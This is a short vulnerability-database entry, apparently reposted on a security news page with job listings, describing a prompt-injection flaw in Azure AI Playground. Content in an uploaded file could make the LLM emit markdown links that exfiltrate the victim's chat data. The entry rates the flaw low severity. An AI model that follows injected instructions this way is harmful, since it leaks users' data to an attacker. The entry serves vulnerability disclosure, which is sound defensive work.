Oct. 19, 2023, midnight |

The Open Cloud Vulnerability & Security Issue Database www.cloudvulndb.org

In Azure AI Playground, a Prompt Injection attack could cause an LLM to return markdown tags.
This would have allowed an adversary whose data makes it into the chat context
(e.g., via an uploaded file) to achieve exfiltration of the victim’s
data by rendering hyperlinks. However, the severity of this issue is low,
as there were no integrations that could pull remote content. This means
Indirect Prompt Injection was not possible, and it would require the victim to copy
the …

adversary attack azure azure ai chat context data data exfiltration exfiltration file injection injection attack issue llm low markdown prompt prompt injection return severity tags victim

Sr. Product Manager

@ MixMode | Remote, US

Information Security Engineers

@ D. E. Shaw Research | New York City

Technology Security Analyst

@ Halton Region | Oakville, Ontario, Canada

Senior Cyber Security Analyst

@ Valley Water | San Jose, CA

PNT/NAVWAR Space Electronic Warfare Instructor II – Officer Training Course

@ Aleut Federal | Colorado Springs, Colorado, United States

Sr Director, Cybersecurity SIRT

@ Workday | USA, VA, McLean